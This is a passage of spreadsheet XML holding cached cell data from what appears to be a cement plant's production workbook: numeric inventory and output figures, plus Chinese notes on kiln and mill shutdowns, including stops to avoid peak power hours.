            <v>窑:续停。水泥磨:10：00-24：00避峰停机。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:正常；1#磨:14:30-22:30避峰停机。2#磨:14:30-23:20避峰停机。3#磨:14:30-22:30避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨14:30-24:00避峰停机:9.5小时(避峰)。2#磨运行正常。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="31"/>
      <sheetData sheetId="32"/>
      <sheetData sheetId="33"/>
      <sheetData sheetId="3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26"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"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heet1"/>
      <sheetName val="稿"/>
      <sheetName val="稿2"/>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调整表"/>
      <sheetName val="月报"/>
      <sheetName val="Sheet2"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1"/>
      <sheetData sheetId="2"/>
      <sheetData sheetId="3">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>769.18</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>821</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>9593.511</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6566</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>6014.25</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>190518.102</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5445</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7024.6</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>81473.71</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>147.8</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>16491.78</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>4604</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>3749.54</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>40688.62</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>529</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1568.5</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>13361.49</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>312</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1558.76</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>10931.82</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>363.32</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>241</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1353.866</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1462.47</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>473.78</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>24</v>
          </cell>
          <cell r="S101">
            <v>5207.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>64.7676492537313</v>
          </cell>
          <cell r="W101">
            <v>273.583333333333</v>
          </cell>
          <cell r="X101">
            <v>273.583333333333</v>
          </cell>
          <cell r="Y101">
            <v>259.999819484844</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>35.3880472636816</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>24</v>
          </cell>
          <cell r="S104">
            <v>5184.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>64.4782338308458</v>
          </cell>
          <cell r="W104">
            <v>28.5105086810861</v>
          </cell>
          <cell r="X104">
            <v>28.5105086810861</v>
          </cell>
          <cell r="Y104">
            <v>25.9559017184185</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.8778855721393</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>10</v>
          </cell>
          <cell r="R107">
            <v>10</v>
          </cell>
          <cell r="S107">
            <v>2495.43</v>
          </cell>
          <cell r="T107">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U107">
            <v>41.6666666666667</v>
          </cell>
          <cell r="V107">
            <v>31.0376865671641</v>
          </cell>
          <cell r="W107">
            <v>128</v>
          </cell>
          <cell r="X107">
            <v>128</v>
          </cell>
          <cell r="Y107">
            <v>131.915541610063</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>10</v>
          </cell>
          <cell r="R108">
            <v>10</v>
          </cell>
          <cell r="S108">
            <v>2206.85</v>
          </cell>
          <cell r="T108">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U108">
            <v>41.6666666666667</v>
          </cell>
          <cell r="V108">
            <v>27.4483830845771</v>
          </cell>
          <cell r="W108">
            <v>129.4</v>
          </cell>
          <cell r="X108">
            <v>129.4</v>
          </cell>
          <cell r="Y108">
            <v>127.43321929447</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.17</v>
          </cell>
          <cell r="R109">
            <v>11.17</v>
          </cell>
          <cell r="S109">
            <v>2806.76</v>
          </cell>
          <cell r="T109">
            <v>46.5416666666667</v>
          </cell>
          <cell r="U109">
            <v>46.5416666666667</v>
          </cell>
          <cell r="V109">
            <v>34.9099502487562</v>
          </cell>
          <cell r="W109">
            <v>257.027752909579</v>
          </cell>
          <cell r="X109">
            <v>257.027752909579</v>
          </cell>
          <cell r="Y109">
            <v>271.256181504654</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>0</v>
          </cell>
          <cell r="R110">
            <v>0</v>
          </cell>
          <cell r="S110">
            <v>2764.06</v>
          </cell>
          <cell r="T110">
            <v>0</v>
          </cell>
          <cell r="U110">
            <v>0</v>
          </cell>
          <cell r="V110">
            <v>34.378855721393</v>
          </cell>
          <cell r="W110">
            <v>0</v>
          </cell>
          <cell r="X110">
            <v>0</v>
          </cell>
          <cell r="Y110">
            <v>268.850893251232</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="4">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>1064.14</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>827</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>9830.651</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6589</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>5777.9</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>191329.202</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>6061</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>7537.66</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>79997.05</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>405.48</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>16086.3</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>2712</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>3934.9</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>39465.72</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>3349</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1671.62</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>15038.87</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1525.66</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>9406.16</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>233.34</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>254</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1333.206</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>1871.9</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>48</v>
          </cell>
          <cell r="S101">
            <v>5231.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>64.8725074404762</v>
          </cell>
          <cell r="W101">
            <v>274.541666666667</v>
          </cell>
          <cell r="X101">
            <v>274.0625</v>
          </cell>
          <cell r="Y101">
            <v>260.066533889446</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>35.2827256944444</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>48</v>
          </cell>
          <cell r="S104">
            <v>5208.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>64.5839533730159</v>
          </cell>
          <cell r="W104">
            <v>29.1394748823797</v>
          </cell>
          <cell r="X104">
            <v>28.8255416191571</v>
          </cell>
          <cell r="Y104">
            <v>25.9713450003939</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.7740823412698</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>10</v>
          </cell>
          <cell r="R107">
            <v>20</v>
          </cell>
          <cell r="S107">
            <v>2505.43</v>
          </cell>
          <cell r="T107">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U107">
            <v>41.6666666666667</v>
          </cell>
          <cell r="V107">
            <v>31.0693204365079</v>
          </cell>
          <cell r="W107">
            <v>123.7</v>
          </cell>
          <cell r="X107">
            <v>125.85</v>
          </cell>
          <cell r="Y107">
            <v>131.882750665555</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.5</v>
          </cell>
          <cell r="R108">
            <v>21.5</v>
          </cell>
          <cell r="S108">
            <v>2218.35</v>
          </cell>
          <cell r="T108">
            <v>47.9166666666667</v>
          </cell>
          <cell r="U108">
            <v>44.7916666666667</v>
          </cell>
          <cell r="V108">
            <v>27.5093005952381</v>
          </cell>
          <cell r="W108">
            <v>128.260869565217</v>
          </cell>
          <cell r="X108">
            <v>128.790697674419</v>
          </cell>
          <cell r="Y108">
            <v>127.437509860933</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.83</v>
          </cell>
          <cell r="R109">
            <v>23</v>
          </cell>
          <cell r="S109">
            <v>2818.59</v>
          </cell>
          <cell r="T109">
            <v>49.2916666666667</v>
          </cell>
          <cell r="U109">
            <v>47.9166666666667</v>
          </cell>
          <cell r="V109">
            <v>34.9527529761904</v>
          </cell>
          <cell r="W109">
            <v>283.093829247675</v>
          </cell>
          <cell r="X109">
            <v>270.434782608696</v>
          </cell>
          <cell r="Y109">
            <v>271.305865698807</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>0</v>
          </cell>
          <cell r="R110">
            <v>0</v>
          </cell>
          <cell r="S110">
            <v>2764.06</v>
          </cell>
          <cell r="T110">
            <v>0</v>
          </cell>
          <cell r="U110">
            <v>0</v>
          </cell>
          <cell r="V110">
            <v>34.2765376984127</v>
          </cell>
          <cell r="W110">
            <v>0</v>
          </cell>
          <cell r="X110">
            <v>0</v>
          </cell>
          <cell r="Y110">
            <v>268.850893251232</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="5">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>193.24</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>820</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>9203.891</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6539</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>6018.88</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>191849.322</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>5987</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8402.84</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>77581.21</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>236.34</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>15849.96</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>3008</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4733.94</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>37739.78</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>2979</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1727.04</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>16290.83</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1705.52</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>7700.64</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>369.32</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>233</v>
          </cell>
        </row>
        <row r="50">
          <cell r="Y50">
            <v>1469.526</v>
          </cell>
        </row>
        <row r="56">
          <cell r="E56">
            <v>0</v>
          </cell>
        </row>
        <row r="56">
          <cell r="I56">
            <v>2037.88</v>
          </cell>
        </row>
        <row r="69">
          <cell r="I69">
            <v>0</v>
          </cell>
        </row>
        <row r="101">
          <cell r="Q101">
            <v>24</v>
          </cell>
          <cell r="R101">
            <v>72</v>
          </cell>
          <cell r="S101">
            <v>5255.319</v>
          </cell>
          <cell r="T101">
            <v>100</v>
          </cell>
          <cell r="U101">
            <v>100</v>
          </cell>
          <cell r="V101">
            <v>64.9767433234421</v>
          </cell>
          <cell r="W101">
            <v>272.458333333333</v>
          </cell>
          <cell r="X101">
            <v>273.527777777778</v>
          </cell>
          <cell r="Y101">
            <v>260.123124780817</v>
          </cell>
        </row>
        <row r="102">
          <cell r="Q102">
            <v>0</v>
          </cell>
          <cell r="R102">
            <v>0</v>
          </cell>
          <cell r="S102">
            <v>2845.199</v>
          </cell>
          <cell r="T102">
            <v>0</v>
          </cell>
          <cell r="U102">
            <v>0</v>
          </cell>
          <cell r="V102">
            <v>35.1780291790307</v>
          </cell>
          <cell r="W102">
            <v>0</v>
          </cell>
          <cell r="X102">
            <v>0</v>
          </cell>
          <cell r="Y102">
            <v>240.280205356462</v>
          </cell>
        </row>
        <row r="104">
          <cell r="Q104">
            <v>24</v>
          </cell>
          <cell r="R104">
            <v>72</v>
          </cell>
          <cell r="S104">
            <v>5232.05</v>
          </cell>
          <cell r="T104">
            <v>100</v>
          </cell>
          <cell r="U104">
            <v>100</v>
          </cell>
          <cell r="V104">
            <v>64.6890454995054</v>
          </cell>
          <cell r="W104">
            <v>27.894173421007</v>
          </cell>
          <cell r="X104">
            <v>28.5162993805208</v>
          </cell>
          <cell r="Y104">
            <v>25.9805573709955</v>
          </cell>
        </row>
        <row r="105">
          <cell r="Q105">
            <v>0</v>
          </cell>
          <cell r="R105">
            <v>0</v>
          </cell>
          <cell r="S105">
            <v>2804.182</v>
          </cell>
          <cell r="T105">
            <v>0</v>
          </cell>
          <cell r="U105">
            <v>0</v>
          </cell>
          <cell r="V105">
            <v>34.6708951533136</v>
          </cell>
          <cell r="W105">
            <v>0</v>
          </cell>
          <cell r="X105">
            <v>0</v>
          </cell>
          <cell r="Y105">
            <v>29.9342377123697</v>
          </cell>
        </row>
        <row r="107">
          <cell r="Q107">
            <v>10.83</v>
          </cell>
          <cell r="R107">
            <v>30.83</v>
          </cell>
          <cell r="S107">
            <v>2516.26</v>
          </cell>
          <cell r="T107">
            <v>45.125</v>
          </cell>
          <cell r="U107">
            <v>42.8194444444444</v>
          </cell>
          <cell r="V107">
            <v>31.1110286844708</v>
          </cell>
          <cell r="W107">
            <v>124.09972299169</v>
          </cell>
          <cell r="X107">
            <v>125.235160557898</v>
          </cell>
          <cell r="Y107">
            <v>131.849252461987</v>
          </cell>
        </row>
        <row r="108">
          <cell r="Q108">
            <v>11.5</v>
          </cell>
          <cell r="R108">
            <v>33</v>
          </cell>
          <cell r="S108">
            <v>2229.85</v>
          </cell>
          <cell r="T108">
            <v>47.9166666666667</v>
          </cell>
          <cell r="U108">
            <v>45.8333333333333</v>
          </cell>
          <cell r="V108">
            <v>27.5698565776459</v>
          </cell>
          <cell r="W108">
            <v>126.086956521739</v>
          </cell>
          <cell r="X108">
            <v>127.848484848485</v>
          </cell>
          <cell r="Y108">
            <v>127.43054465547</v>
          </cell>
        </row>
        <row r="109">
          <cell r="Q109">
            <v>11.17</v>
          </cell>
          <cell r="R109">
            <v>34.17</v>
          </cell>
          <cell r="S109">
            <v>2829.76</v>
          </cell>
          <cell r="T109">
            <v>46.5416666666667</v>
          </cell>
          <cell r="U109">
            <v>47.4583333333333</v>
          </cell>
          <cell r="V109">
            <v>34.9871414441147</v>
          </cell>
          <cell r="W109">
            <v>285.85496866607</v>
          </cell>
          <cell r="X109">
            <v>275.475563359672</v>
          </cell>
          <cell r="Y109">
            <v>271.363295827208</v>
          </cell>
        </row>
        <row r="110">
          <cell r="Q110">
            <v>0</v>
          </cell>
          <cell r="R110">
            <v>0</v>
          </cell>
          <cell r="S110">
            <v>2764.06</v>
          </cell>
          <cell r="T110">
            <v>0</v>
          </cell>
          <cell r="U110">
            <v>0</v>
          </cell>
          <cell r="V110">
            <v>34.1748269040553</v>
          </cell>
          <cell r="W110">
            <v>0</v>
          </cell>
          <cell r="X110">
            <v>0</v>
          </cell>
          <cell r="Y110">
            <v>268.850893251232</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="6">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="P10">
            <v>0</v>
          </cell>
          <cell r="Q10">
            <v>9645.331</v>
          </cell>
          <cell r="R10">
            <v>681.96</v>
          </cell>
        </row>
        <row r="10">
          <cell r="V10">
            <v>770</v>
          </cell>
        </row>
        <row r="10">
          <cell r="Y10">
            <v>9115.851</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>189966.352</v>
          </cell>
          <cell r="E17">
            <v>6539</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>6155.91</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>192232.412</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>83053.31</v>
          </cell>
          <cell r="E22">
            <v>6243</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>8287.96</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>75536.25</v>
          </cell>
        </row>
        <row r="23">
          <cell r="D23">
            <v>16639.58</v>
          </cell>
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="I23">
            <v>560.5</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>15289.46</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>39834.16</v>
          </cell>
          <cell r="E24">
            <v>6243</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4287.42</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>39695.36</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>14400.99</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>1683.7</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>14607.13</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>0</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>12178.58</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1756.34</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>5944.3</v>
          </cell>
        </row>
        <row r="44">
          <cell r="P44">
            <v>0</v>
          </cell>
          <cell r="Q44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="S44">
            <v>0</v>
          </cell>
          <cell r="T44">
            <v>0</v>
          </cell>
        </row>
        <row r="44">
          <cell r="W44">
            <v>0</v>
          </cell>
          <cell r="X44">
            <v>0</v>
          </cell>
          <cell r="Y44">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="P50">
            <v>0</v>
          </cell>
          <cell r="Q50">
            <v>1231.546</v>
          </cell>
          <cell r="R50">
            <v>229.14</v>
          </cell>
        </row>
        <row r="50">
          <cell r="V50">
            <v>270</v>
          </cell>
        </row>
        <row r="50">
